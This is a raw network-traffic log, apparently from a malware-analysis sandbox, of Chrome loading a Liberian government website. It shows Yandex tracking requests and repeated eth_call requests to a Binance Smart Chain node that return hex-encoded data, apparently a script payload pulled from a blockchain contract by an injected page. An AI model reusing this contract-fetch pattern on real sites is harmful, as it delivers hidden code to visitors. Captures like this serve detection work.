                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
                                                                                                                        2025-01-10 13:54:52 UTC720INHTTP/1.1 200 Ok
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 547
                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Expires: Fri, 10-Jan-2025 13:54:52 GMT
                                                                                                                        Last-Modified: Fri, 10-Jan-2025 13:54:52 GMT
                                                                                                                        Pragma: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:52 UTC547INData Raw: 7b 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 61 75 74 6f 5f 67 6f 61 6c 73 22 3a 30 2c 22 62 75 74 74 6f 6e 5f 67 6f 61 6c 73 22 3a 30 2c 22 63 5f 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 2c 22 66 6f 72 6d 5f 67 6f 61 6c 73 22 3a 30 2c 22 70 63 73 22 3a 22 31 22 2c 22 77 65 62 76 69 73 6f 72 22 3a 7b 22 61 72 63 68 5f 74 79 70 65 22 3a 22 6e 6f 6e 65 22 2c 22 64 61 74 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 32 20 30 31 3a 32 38 3a 32 35 22 2c 22 66 6f 72 6d 73 22 3a 31 2c 22 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 7d 2c 22 73 62 70 22 3a 20 7b 22 61 22 3a 22 52 38 47 6a 61 69 31 71 6d 72 2f 42 79 64 57 42 55 73 77 31 72 30 51 5a 35 66 4b 66 52 46 79 67 67 5a 42 51 4d 2b 37 55 37 2b 68 48 46 72 64 35 6c 6d 75 72 75 78 66 74 30 6d 72 4e 77 53 51 74 22
                                                                                                                        Data Ascii: {"settings":{"auto_goals":0,"button_goals":0,"c_recp":"1.00000","form_goals":0,"pcs":"1","webvisor":{"arch_type":"none","date":"2024-12-22 01:28:25","forms":1,"recp":"1.00000"},"sbp": {"a":"R8Gjai1qmr/BydWBUsw1r0QZ5fKfRFyggZBQM+7U7+hHFrd5lmuruxft0mrNwSQt"


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        89192.168.2.749902192.0.77.484432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC368OUTGET /images/core/emoji/15.0.3/svg/2705.svg HTTP/1.1
                                                                                                                        Host: s.w.org
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:52 UTC464INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:52 GMT
                                                                                                                        Content-Type: image/svg+xml
                                                                                                                        Content-Length: 482
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Tue, 30 Jan 2024 01:21:10 GMT
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                        X-nc: HIT jfk 1
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        2025-01-10 13:54:52 UTC482INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 37 42 32 35 35 22 20 64 3d 22 4d 33 36 20 33 32 63 30 20 32 2e 32 30 39 2d 31 2e 37 39 31 20 34 2d 34 20 34 48 34 63 2d 32 2e 32 30 39 20 30 2d 34 2d 31 2e 37 39 31 2d 34 2d 34 56 34 63 30 2d 32 2e 32 30 39 20 31 2e 37 39 31 2d 34 20 34 2d 34 68 32 38 63 32 2e 32 30 39 20 30 20 34 20 31 2e 37 39 31 20 34 20 34 76 32 38 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 22 20 64 3d 22 4d 32 39 2e 32 38 20 36 2e 33 36 32 63 2d 31 2e 31 35 36 2d 2e 37 35 31 2d 32 2e 37 30 34 2d 2e 34 32 32 2d 33 2e 34 35 38 2e 37 33 36 4c 31 34 2e
                                                                                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#77B255" d="M36 32c0 2.209-1.791 4-4 4H4c-2.209 0-4-1.791-4-4V4c0-2.209 1.791-4 4-4h28c2.209 0 4 1.791 4 4v28z"/><path fill="#FFF" d="M29.28 6.362c-1.156-.751-2.704-.422-3.458.736L14.


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        90192.168.2.74991052.223.34.1554432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC348OUTGET / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:53 UTC563INHTTP/1.1 404 Not Found
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:53 GMT
                                                                                                                        Content-Type: text/plain
                                                                                                                        Content-Length: 18
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: 5d8cf6f16309f790cd06436dee62ae69
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:53 UTC18INData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                        Data Ascii: 404 page not found


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        91192.168.2.74990835.71.137.1054432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:52 UTC604OUTPOST / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        Content-Length: 173
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Content-Type: application/json
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:52 UTC173OUTData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 30 37 35 31 66 34 66 34 2d 64 30 64 64 2d 34 37 66 61 2d 39 64 64 31 2d 37 64 39 65 32 30 31 39 62 64 38 33 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 38 46 42 41 31 36 36 37 42 45 46 35 45 64 41 34 33 33 39 32 38 62 32 32 30 38 38 36 41 38 33 30 34 38 38 35 34 39 42 44 22 2c 22 64 61 74 61 22 3a 22 30 78 34 33 32 63 34 32 65 35 22 7d 2c 22 6c 61 74 65 73 74 22 5d 7d
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"0751f4f4-d0dd-47fa-9dd1-7d9e2019bd83","method":"eth_call","params":[{"to":"0x8FBA1667BEF5EdA433928b220886A830488549BD","data":"0x432c42e5"},"latest"]}
                                                                                                                        2025-01-10 13:54:53 UTC608INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:53 GMT
                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: c2ee2155508411ee3da3d1a2127e979c
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:53 UTC2642INData Raw: 61 34 62 0d 0a 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 30 37 35 31 66 34 66 34 2d 64 30 64 64 2d 34 37 66 61 2d 39 64 64 31 2d 37 64 39 65 32 30 31 39 62 64 38 33 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 61 38 34 38 33 34 37 33 34 39 34 31 34 35 33 32 34 62 35 39 35 37 36 33 34 33 32 66 33 34 33 31 35 36 36 32 35 39 32 66 36 31 35 32 36 38 34 34 32 62 36
                                                                                                                        Data Ascii: a4b{"jsonrpc":"2.0","id":"0751f4f4-d0dd-47fa-9dd1-7d9e2019bd83","result":"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004a8483473494145324b595763432f34315662592f615268442b6
                                                                                                                        2025-01-10 13:54:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        92192.168.2.74990977.88.21.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:53 UTC957OUTGET /metrika/advert.gif HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; i=p/dvHhu6BEOtGnOknp7XULB7pXFmRWE/R4UYGrMv0hKW6U9YSot04lO8lS6MHErrb2tV7Y4MjDVF80wdXY+zTWPtAzU=; yandexuid=3283792161736517292; yashr=6034268381736517292
                                                                                                                        2025-01-10 13:54:53 UTC832INHTTP/1.1 200 OK
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:53 GMT
                                                                                                                        ETag: "677fcb03-2b"
                                                                                                                        Expires: Fri, 10 Jan 2025 14:54:53 GMT
                                                                                                                        Last-Modified: Thu, 09 Jan 2025 13:11:31 GMT
                                                                                                                        Set-Cookie: _yasc=3uF/2lFvypDsKrJZlPOphP3xGb+rc43dar45OX9iptQ5StXgxHuBuRbJulbOjpTO96tV; domain=.yandex.com; path=/; expires=Mon, 08 Jan 2035 13:54:53 GMT; secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        2025-01-10 13:54:53 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        93192.168.2.74991177.88.21.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:53 UTC1341OUTGET /sync_cookie_image_decide?token=10611.fH1OoSXDiCxpBQsjNz70vRcfoRCKnV72el8MOyZYUCNzPInswMVnZDixWZGJbZzcYCAPwYpj7I7oMEJSzlmlYQitO10RILaai2SvrMOULwtXGJey34xqsHUZbXqM2IFP8_R0NmA-LVPKkiCHFbb3UOiiVBU70YuNH0QeJGVsn8wIEyFktKtOCKdV6q2ne-bgGW8rqnWWD7Oz0Wepdc5Mf7W_6AMFUHHic0BLUHtJKnI%2C.6n504nlTozvgH4AdcQ2ltdTO0ZU%2C HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yp=1736603692.yu.4571074561736517291; ymex=1739109292.oyu.4571074561736517291#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; sync_cookie_ok=synced
                                                                                                                        2025-01-10 13:54:53 UTC1125INHTTP/1.1 200 Ok
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:53 GMT
                                                                                                                        Set-Cookie: yandexuid=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:53 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yuidss=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:53 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; Expires=Mon, 08-Jan-2035 13:54:53 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yp=1736603693.yu.8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:53 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: ymex=1739109293.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; Expires=Sat, 10-Jan-2026 13:54:53 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: sync_cookie_ok=synced; Expires=Sat, 11-Jan-2025 13:54:53 GMT; Domain=.mc.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:53 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        94192.168.2.74991393.158.134.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:53 UTC936OUTGET /sync_cookie_image_start_secondary?redirect_domain=mc.yandex.com&token=10611.-yuCCBaYK4CRWSzmL9Jm4JCDqIWwZAny2ROmgX36wKGxzWyajnj8lBQ8tt0qLI52.ww_YVhfLx-sE7lYJHl7m8Ok-Tds%2C HTTP/1.1
                                                                                                                        Host: mc.yandex.ru
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yandexuid=8715430261736517288; yashr=3268409401736517288; sync_cookie_csrf=1153950801fake
                                                                                                                        2025-01-10 13:54:53 UTC692INHTTP/1.1 302 Moved temporarily
                                                                                                                        Connection: Close
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:53 GMT
                                                                                                                        Location: https://mc.yandex.com/sync_cookie_image_decide_secondary?token=10611.E_RPzEtQddV8vnmbmr337l8AhKpNAjExaO0ma2jrV489UWaaLcmew_vNOEzVVPlR4V0FkyWD6tXvOp-koVN4RFDajfKwVa-Gertbh0JBcbX7PWnGfqkkQHr8KV5-eSQqWHn092q-SAJ5wKt9uy2VlOci2cQHhZ5JYTT9ijqlRQDjDYA59lR6Mi019uer4JP27BgRTrcR1okFFbS3WOEs7pWSj2X1DAQIkARvPEEYVhY%2C.q-OV7mq2OrNzjNUPbRt_MqDduHY%2C
                                                                                                                        Set-Cookie: sync_cookie_csrf_secondary=924747481fake; Expires=Fri, 10-Jan-2025 14:04:53 GMT; Domain=.mc.yandex.ru; Path=/; SameSite=None; Secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        95192.168.2.74992152.223.34.1554432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:53 UTC348OUTGET / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:53 UTC563INHTTP/1.1 404 Not Found
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:53 GMT
                                                                                                                        Content-Type: text/plain
                                                                                                                        Content-Length: 18
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: a25f58852f9cbb950e61e16bb6796a63
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:53 UTC18INData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                        Data Ascii: 404 page not found


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        96192.168.2.74992035.71.137.1054432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:53 UTC604OUTPOST / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        Content-Length: 173
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Content-Type: application/json
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:53 UTC173OUTData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 36 35 30 38 38 35 33 32 2d 65 38 65 61 2d 34 38 66 63 2d 62 62 30 34 2d 39 31 63 62 35 65 34 64 66 64 65 36 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 38 46 42 41 31 36 36 37 42 45 46 35 45 64 41 34 33 33 39 32 38 62 32 32 30 38 38 36 41 38 33 30 34 38 38 35 34 39 42 44 22 2c 22 64 61 74 61 22 3a 22 30 78 33 31 36 66 34 30 36 33 22 7d 2c 22 6c 61 74 65 73 74 22 5d 7d
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"65088532-e8ea-48fc-bb04-91cb5e4dfde6","method":"eth_call","params":[{"to":"0x8FBA1667BEF5EdA433928b220886A830488549BD","data":"0x316f4063"},"latest"]}
                                                                                                                        2025-01-10 13:54:53 UTC602INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:53 GMT
                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                        Content-Length: 1355
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: f5bad6c4894156167ec0ce780b0fdd90
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
